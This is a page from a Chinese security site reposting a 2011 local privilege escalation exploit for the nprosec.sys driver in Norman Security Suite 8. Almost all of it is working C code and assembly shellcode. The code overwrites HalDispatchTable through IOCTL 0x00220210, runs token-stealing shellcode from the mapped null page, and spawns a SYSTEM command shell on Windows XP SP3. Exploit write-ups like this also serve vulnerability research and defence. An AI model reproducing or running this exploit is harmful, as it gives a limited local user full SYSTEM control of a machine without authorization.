首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Norman Security Suite 8 (nprosec.sys) Local Privilege Escalation 0day
来源:http://poppopret.blogspot.com 作者:Xst3nZ 发布时间:2011-09-29  

#include <stdio.h>
#include <windows.h>
#include <winioctl.h>
#include <tchar.h>

/*

Discovered by  : Xst3nZ (Jérémy Brun-Nouvion)


----[ Software ]-------------------------------------------------------------------------

Program        : Norman Security Suite 8
Official page  : http://www.norman.com/products/security_suite/en
Description    : "This easy-to-use software will protect you from inappropriate content,
                  rootkits and other hostile activity, whether you are using online
                  banking, chatting, emailing, playing games or just surfing the net."
    This suite contains: Intrusion Guards, Privacy Tools,
           Norman Scanner Engine, Personal Firewall, Antivirus
Certified by   : OPSWAT


----[ Vulnerability ]--------------------------------------------------------------------

Discovery        : 2011-09-26
Description      : The driver "nprosec.sys" is vulnerable to a kernel pointer dereferencement.
                   This vulnerability allows an attacker with a local access to the machine
     to escalate his privilege, that is to say to gain SYSTEM privileges from
     a limited account.
Affected IOCTL   : 0x00220210

Status           : 0day
Vendor contacted : 2011-09-28


----[ Contact ]--------------------------------------------------------------------------

Mail           : xst3nz (at) gmail (dot) com
Twitter        : @Xst3nZ
Personal Blog  : http://poppopret.blogspot.com


----[ Exploitation PoC ]-----------------------------------------------------------------

Tested on      : Windows XP SP3 (offsets may be changed for other versions)
Demo           :

[~] Open an handle to the driver \\.\nprosec ...
[+] Handle: 000007E8
[~] Retrieve Kernel address of HalDispatchTable ...
[+] HalDispatchTable+4 (0x8054593c) will be overwritten
[~] Map executable memory 0x00000000 - 0x0000FFFF ...
[~] Put the Shellcode to steal System process Token @ 0x00005000
[~] Update Shellcode with PID of the current process ...
[+] Shellcode updated with PID = 3604

[~] Ready ? Press any key to send IOCTL (0x00220210) with payload...
[+] IOCTL sent !
[~] Launch the shellcode ...
[+] Okay... System Token should be stolen, let's spawn a SYSTEM shell :)


----[ GreetZ ]---------------------------------------------------------------------------

Heurs

*/


typedef struct {
    PVOID   Unknown1;
    PVOID   Unknown2;
    PVOID   Base;
    ULONG   Size;
    ULONG   Flags;
    USHORT  Index;
    USHORT  NameLength;
    USHORT  LoadCount;
    USHORT  PathLength;
    CHAR    ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
 
typedef struct {
    ULONG   Count;
    SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
  SystemModuleInformation = 11,
  SystemHandleInformation = 16
} SYSTEM_INFORMATION_CLASS;

typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)(
   SYSTEM_INFORMATION_CLASS SystemInformationClass,
   PVOID SystemInformation,
   ULONG SystemInformationLength,
   PULONG ReturnLength
);
typedef NTSTATUS (__stdcall *_NtQueryIntervalProfile)(DWORD ProfileSource, PULONG Interval);
typedef NTSTATUS (__stdcall *_NtAllocateVirtualMemory)(HANDLE ProcessHandle, PVOID *BaseAddress,
                ULONG_PTR ZeroBits, PSIZE_T RegionSize,
                ULONG AllocationType, ULONG Protect);


ULONG_PTR HalDispatchTable;
SYSTEM_INFO GlobalInfo;


// Retrieve the real kernel address of a given symbol -----------------------------------
FARPROC GetKernAddress(HMODULE UserKernBase, PVOID RealKernelBase, LPCSTR SymName) {
 PUCHAR KernBaseTemp  = (PUCHAR)UserKernBase;
 PUCHAR RealKernBaseTemp = (PUCHAR)RealKernelBase;
 PUCHAR temp = (PUCHAR)GetProcAddress(UserKernBase, SymName);
 if(temp == NULL)
  return NULL;
  
 return (FARPROC)(temp - KernBaseTemp + RealKernBaseTemp);
}

// Retrieve kernel address of HalDispatchTable ------------------------------------------
BOOL LoadAndGetKernelBase() {
 CHAR kFullName[256];
 PVOID kBase=NULL;
 LPSTR kName;
 HMODULE NTosHandle;
 _NtQuerySystemInformation NtQuerySystemInformation;
 PSYSTEM_MODULE_INFORMATION pModuleInfo;
 ULONG len;
 NTSTATUS ret;
 HMODULE ntdllHandle;

 ntdllHandle = GetModuleHandle((LPCTSTR)"ntdll");
 if(!ntdllHandle) {
  return FALSE;
 }

 NtQuerySystemInformation =  (_NtQuerySystemInformation)GetProcAddress(ntdllHandle,
                             "NtQuerySystemInformation");
 if(!NtQuerySystemInformation) {
  return FALSE;
 }
  
 ret = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len);
 if(!ret) {
  return FALSE;
 }
  
 pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);
 ret = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len);
 
 
 memset(kFullName, 0x00, sizeof(kFullName));
 strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName);
 kBase = pModuleInfo->Module[0].Base;

 kName = strrchr(kFullName, '\\');
 NTosHandle = LoadLibraryA(++kName);

 if(NTosHandle == NULL) {
  return FALSE;
 }
 
 HalDispatchTable = (ULONG_PTR)GetKernAddress(NTosHandle, kBase, "HalDispatchTable");
 if(!HalDispatchTable)
  return FALSE;

 return TRUE;
}

// Create a child process ---------------------------------------------------------------
BOOL CreateChild(PWCHAR Child) {

    PROCESS_INFORMATION pi;
   STARTUPINFO si;

    ZeroMemory( &si, sizeof(si) );
    si.cb = sizeof(si);
    ZeroMemory( &pi, sizeof(pi) );

    if (!CreateProcess(Child, Child, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
        return FALSE;

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return TRUE;
}


// Shellcode used to steal the Access Token of the System process (PID=4) ---------------
/*

shellcode:

; ----------------------------------------------------------------------
;                  Shellcode for Windows XP SP3
; ----------------------------------------------------------------------

; Offsets
WINXP_KTHREAD_OFFSET   equ 124h    ; nt!_KPCR.PcrbData.CurrentThread
WINXP_EPROCESS_OFFSET  equ 044h    ; nt!_KTHREAD.ApcState.Process
WINXP_FLINK_OFFSET     equ 088h    ; nt!_EPROCESS.ActiveProcessLinks.Flink
WINXP_PID_OFFSET       equ 084h    ; nt!_EPROCESS.UniqueProcessId
WINXP_TOKEN_OFFSET     equ 0c8h    ; nt!_EPROCESS.Token
WINXP_SYS_PID          equ 04h     ; PID Process SYSTEM


pushad                                ; save registers

mov eax, fs:[WINXP_KTHREAD_OFFSET]   ; EAX <- current _KTHREAD
mov eax, [eax+WINXP_EPROCESS_OFFSET] ; EAX <- current _KPROCESS == _EPROCESS
push eax


mov ebx, WINXP_SYS_PID

SearchProcessPidSystem:

mov eax, [eax+WINXP_FLINK_OFFSET]     ; EAX <- _EPROCESS.ActiveProcessLinks.Flink
sub eax, WINXP_FLINK_OFFSET           ; EAX <- _EPROCESS of the next process
cmp [eax+WINXP_PID_OFFSET], ebx       ; UniqueProcessId == SYSTEM PID ?
jne SearchProcessPidSystem            ; if no, retry with the next process...

mov edi, [eax+WINXP_TOKEN_OFFSET]     ; EDI <- Token of process with SYSTEM PID
and edi, 0fffffff8h                   ; Must be aligned by 8

pop eax                               ; EAX <- current _EPROCESS


mov ebx, 41414141h

SearchProcessPidToEscalate:

mov eax, [eax+WINXP_FLINK_OFFSET]     ; EAX <- _EPROCESS.ActiveProcessLinks.Flink
sub eax, WINXP_FLINK_OFFSET           ; EAX <- _EPROCESS of the next process
cmp [eax+WINXP_PID_OFFSET], ebx       ; UniqueProcessId == PID of the process
                                      ; to escalate ?
jne SearchProcessPidToEscalate        ; if no, retry with the next process...

SwapTokens:

mov [eax+WINXP_TOKEN_OFFSET], edi     ; We replace the token of the process
                                      ; to escalate by the token of the process
                                      ; with SYSTEM PID

PartyIsOver:

popad                                 ; restore registers
ret

end shellcode
*/

char ShellcodeSwapTokens[] = "\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x44\x50\xBB\x04\x00\x00\x00"
"\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x39\x98\x84\x00\x00"
"\x00\x75\xED\x8B\xB8\xC8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41"
"\x41\x41\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x39\x98\x84"
"\x00\x00\x00\x75\xED\x89\xB8\xC8\x00\x00\x00\x61\xC3";

PUCHAR mapShellcodeSwapTokens = 0x00005000;


// Function used to update the exploit's PID in the shellcode ---------------------------
BOOL MajShellcodePid(){
     DWORD ProcessID;
     DWORD MagicWord = 0x41414141;
     int i;
    
  ProcessID = (DWORD)GetCurrentProcessId();
     for (i=0; i<sizeof(ShellcodeSwapTokens); i++) {
         if (!memcmp(mapShellcodeSwapTokens+i, &MagicWord, 4)) {
            mapShellcodeSwapTokens[i]   = (DWORD)  ProcessID & 0x000000FF;
            mapShellcodeSwapTokens[i+1] = ((DWORD) ProcessID & 0x0000FF00) >> 8;
            mapShellcodeSwapTokens[i+2] = ((DWORD) ProcessID & 0x00FF0000) >> 16;
            mapShellcodeSwapTokens[i+3] = ((DWORD) ProcessID & 0xFF000000) >> 24;
            return TRUE;
         }
     }
     return FALSE;
}


// Exploit Main function ----------------------------------------------------------------
int main(int argc, char *argv[]) {
 
 HANDLE hDevice;

 DWORD input[] = { 0xffff0000, 0x00000008 };
 DWORD output[0x8];

 ULONG dummy = 0;
 PCHAR addr  = (PCHAR)1;
 ULONG size  = 0xffff;
 NTSTATUS status;

 ULONG_PTR HalDispatchTableTarget;
 _NtQueryIntervalProfile  NtQueryIntervalProfile;
 _NtAllocateVirtualMemory NtAllocateVirtualMemory;


 NtQueryIntervalProfile  = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle((LPCSTR)"ntdll.dll"),
      "NtQueryIntervalProfile");
 NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"),
                    "NtAllocateVirtualMemory");

        
 printf("------------------------------------------------------------------\n");
 printf("     Norman Security Suite 8 (nprosec.sys - IOCTL 0x00220210)     \n");
 printf("   Local Privilege Escalation using Kernel pointer dereference    \n");
 printf("            Proof of Concept tested on Win XP SP3                 \n");
 printf("------------------------------------------------------------------\n\n");

 printf("[~] Open an handle to the driver \\\\.\\nprosec ...\n");
 hDevice = CreateFile("\\\\.\\nprosec",
      GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);

 if(hDevice == (HANDLE)0xFFFFFFFF) {
  printf("[!] Cannot open a handle to the driver, it is probably not loaded. ");
  printf("Error : %d\n", GetLastError());
  exit(1);
 }
 
 printf("[+] Handle: %p\n",hDevice);


 printf("[~] Retrieve Kernel address of HalDispatchTable ...\n"); 
 if(LoadAndGetKernelBase() == FALSE) {
  printf("[!] An error occured ! Impossible to retrieve the address.\n");
  exit(1);
 }
 HalDispatchTableTarget = HalDispatchTable + sizeof(ULONG_PTR);
 printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", (DWORD)HalDispatchTableTarget);
 input[0] = (DWORD)HalDispatchTableTarget;


 printf("[~] Map executable memory 0x00000000 - 0x0000FFFF ...\n");
     status = NtAllocateVirtualMemory((HANDLE)0xffffffff, (PVOID *) &addr, 0, &size,
                                          MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

 if(status) {
  printf("[!] An error occured while mapping executable memory. Status = 0x%08x\n", status);
  exit(1);
 }
 
 
 printf("[~] Put the Shellcode to steal System process Token @ 0x%08x\n", (DWORD)mapShellcodeSwapTokens);
 memset(1, '\x90', 0xffff);
 RtlCopyMemory(0x00005000, ShellcodeSwapTokens, sizeof(ShellcodeSwapTokens));

 printf("[~] Update Shellcode with PID of the current process ...\n");
 if(!MajShellcodePid()) {
  printf("[!] An error occured\n");
  exit(1);
 }
 printf("[+] Shellcode updated with PID = %d\n\n", (DWORD)GetCurrentProcessId());
 

 printf("[~] Ready ? Press any key to send IOCTL (0x00220210) with payload...\n");
 getch();
 DeviceIoControl(hDevice, 0x00220210, &input, 0x8, &output, 0x8, NULL, NULL);
 printf("[+] IOCTL sent !\n");
 
 printf("[~] Launch the shellcode ...\n");
 NtQueryIntervalProfile(2, &dummy);
 printf("[+] Okay... System Token should be stolen, let's spawn a SYSTEM shell :)\n");
 
 if (CreateChild(_T("C:\\WINDOWS\\SYSTEM32\\CMD.EXE")) != TRUE) {
  printf("[!] Unable to spawn process. Error: %d\n", GetLastError());
  exit(1);
 }
 
     CloseHandle(hDevice);
 getch();

     return 0; 
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mac OS X < 10.6.7 Kernel Panic
·ScriptFTP 3.3 Remote Buffer Ov
·SafeKeyNet FTP Server Remote B
·eSignal / eSignal Pro 10.6.242
·Cliprex Lite Player(.ASF) Loca
·FreeBSD UIPC socket heap overf
·FocusedBeams Backdoor Command
·Ashampoo Burning Studio Elemen
·Advanced MP3 WMA Recorder(.mp3
·PolicyKit Pwnage: linux local
·Metasploit 3.7.x Remote Denial
·DivX Plus Web Player "file://"
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved